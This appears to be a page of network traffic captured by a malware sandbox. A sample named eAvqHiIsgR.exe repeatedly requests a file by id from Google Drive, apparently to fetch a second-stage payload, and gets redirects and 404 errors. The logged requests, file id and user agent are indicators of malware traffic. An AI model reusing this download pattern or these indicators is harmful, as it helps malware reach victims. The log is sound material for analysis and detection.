                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:20 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-96AmGGkxIdYbH4Jqc_G6qA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.549952142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:22 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:23 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:23 GMT
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-KNI-Teaqz8V2xSJeDX3NsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7GmGIfpUg2Ify1PaAvOUmIAwtFIitUAy0QmfOd9imZL-i3uCz6OpPDeqsJpmkgu-9hSPPzRfQZsg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 58 36 51 73 61 41 42 33 76 39 61 31 74 59 38 50 6d 51 69 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aX6QsaAB3v9a1tY8PmQi9Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.549953172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:25 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:26 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:26 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-QSAE3K3GYj45mXuEQhMDZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.549954142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:28 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:29 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:29 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-OL1--5BaKnVjYlJAzZJb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC4VhU31ORDUXpE0CLbuQ5mCrmXeCnJ8qgNojShjeVZr7Zh26PcVor7TPkpz_S9BsmTiZ-W4al45TQ
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 73 2d 43 74 4d 73 6c 71 67 72 77 37 53 34 35 74 54 52 4d 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hs-CtMslqgrw7S45tTRMvw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.549955172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:31 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:32 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:31 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-mPGk2PjS9lxyRnjVzIldGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.549956142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:34 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:35 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:34 GMT
                                                                    Content-Security-Policy: script-src 'nonce-P5H0aHfPGSlumNyI8nhDiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7I6SN12om3jzpykNrFOKJOawTPTvqtdMuyFBuTNvGA6oPEmOvYJ6uMR4dGOlfFAmmmeAVpE4IPLA
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6b 79 6d 7a 6d 31 49 4b 59 41 55 62 48 68 50 71 79 35 53 52 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Akymzm1IKYAUbHhPqy5SRw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.549957172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:37 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:37 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:37 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-9y8UN44MH9u5gAPuHn5xdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.549958142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:39 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:40 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:40 GMT
                                                                    Content-Security-Policy: script-src 'nonce-p8EvI-82T8v5BjV7A92iNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5beLnL5QzQF8Ycy0R-t3P2FjfFgFniNT9o55-3xIOD0Q7Z9skv201rLe9F1hF3wT0PorXc6kUIcg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
